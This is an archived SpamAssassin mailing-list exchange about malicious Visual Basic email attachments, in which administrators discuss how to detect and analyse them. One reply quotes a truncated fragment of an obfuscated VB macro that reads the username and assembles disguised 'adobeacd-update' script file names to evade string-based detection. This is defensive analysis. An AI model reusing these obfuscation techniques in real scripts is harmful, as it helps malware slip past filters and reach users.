Thank you all for your comments, very much appreciated
Tony
Date: Wed, 18 Feb 2015 12:28:11 -0700
From: ml-node+s1065346n114635...@n5.nabble.com
To: tiar...@hotmail.com
Subject: Re: Recent spate of Malicious VB attachments II
On Wed, 18 Feb 2015 14:16:02 -0500
Joe Quinn <[hidden email]> wrote:
> On 2/18/2015 2:10 PM, Reindl Harald wrote:
> > the source contains at least socket:// and heavy pulsating disk-IO
> > noticed from the RAID10 as long the process was active - will give
> > it a try in a isolated VM to look what it does the next spare time
> Or if there was an SA-style classifier for malware that scores files
> in addition to "this is a keylogger".
A lot of the samples we see heavily obfuscate the VB code. Example:
Sub h()
ds = 99 + Sgn(98) + Sgn(902) + Sgn(-5)
USER = Module1.Travel("username")
jks = ds
PST2 = "" + "" & "" & "a" + "do" & "be" & "ac" & "d-u" & "pd" & "a" & "te"
& ""
VBT2 = "" & "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te" & ""
VBTXP2 = "" & "a" & Chr(100) & "o" & "be" + "ac" & "d-u" + "pd" + "atex" +
"p" & ""
BART2 = "" & "a" + Chr(100) & "o" & "b" & "e" + "ac" & "d-up" + "date" & ""
PST1 = PST2 + "." + Chr(Asc("p")) + Chr(ds + 15) + "1" + ""
VBT1 = VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
... more of the same
This makes a simple-minded "strings" inadequate. :( I've also seen
highly-obfuscated Javascript code that builds up strings and then evaluates
them as Javascript.
Regards,
David.
If you reply to this email, your message will be added to the
discussion below:
http://spamassassin.1065346.n5.nabble.com/Recent-spate-of-Malicious-VB-attachments-II-tp114621p114635.html
To unsubscribe from Recent spate of Malicious VB attachments
II, click here.
NAML
--
View this message in context:
http://spamassassin.1065346.n5.nabble.com/Recent-spate-of-Malicious-VB-attachments-II-tp114621p114639.html
Sent from the SpamAssassin - Users mailing list archive at Nabble.com.
